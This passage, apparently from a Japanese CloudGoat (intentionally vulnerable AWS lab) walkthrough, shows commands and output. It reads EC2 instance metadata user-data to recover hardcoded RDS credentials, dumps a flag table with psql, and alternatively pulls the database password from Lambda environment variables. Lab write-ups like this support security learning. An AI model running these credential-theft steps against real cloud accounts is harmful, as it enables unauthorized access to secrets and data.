root@ip-10-10-10-218:~# curl http://169.254.169.254/latest/user-data #!/bin/bash apt-get update apt-get install -y postgresql-client psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \ -c "CREATE TABLE sensitive_information (name VARCHAR(100) NOT NULL, value VARCHAR(100) NOT NULL);" psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \ -c "INSERT INTO sensitive_information (name,value) VALUES ('Key1','V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4');" psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \ -c "INSERT INTO sensitive_information (name,value) VALUES ('Key2','V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6');"
これでDBに接続できるので、後は最初のルートと同じ。
root@ip-10-10-10-218:~# psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb psql (10.15 (Ubuntu 10.15-0ubuntu0.18.04.1), server 9.6.19) SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off) Type "help" for help. securedb=> \dt List of relations Schema | Name | Type | Owner --------+-----------------------+-------+--------- public | sensitive_information | table | cgadmin (1 row) securedb=> select * from sensitive_information; name | value ------+-------------------------------------------- Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4 Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6 (2 rows)
または、lambdaの環境変数としてDBの接続情報が登録されているので、これを窃取すればよい。
root@ip-10-10-10-218:~# apt-get update (snip) root@ip-10-10-10-218:~# apt-get install awscli root@ip-10-10-10-218:~# aws lambda list-functions --region us-east-1 { "Functions": [ { "FunctionName": "cg-lambda-cgidysjfe61q7i", "FunctionArn": "arn:aws:lambda:us-east-1:746321857124:function:cg-lambda-cgidysjfe61q7i", "Runtime": "python3.6", "Role": "arn:aws:iam::7***********:role/cg-lambda-role-cgidysjfe61q7i-service-role", "Handler": "lambda.handler", "CodeSize": 163, "Description": "", "Timeout": 3, "MemorySize": 128, "LastModified": "2021-01-07T04:41:44.299+0000", "CodeSha256": "N3l99W/S7z8yvEwY1TLdVgLMk1WC3S1hjokcuc9bKGg=", "Version": "$LATEST", "Environment": { "Variables": { "DB_USER": "cgadmin", "DB_NAME": "securedb", "DB_PASSWORD": "wagrrrrwwgahhhhwwwrrggawwwwwwrr" } }, "TracingConfig": { "Mode": "PassThrough" }, "RevisionId": "9306902f-8135-4330-81b2-a1de21321546" } ] }
ecs_efs_attack
現時点で動作していないようなので、動作するようになったらやる。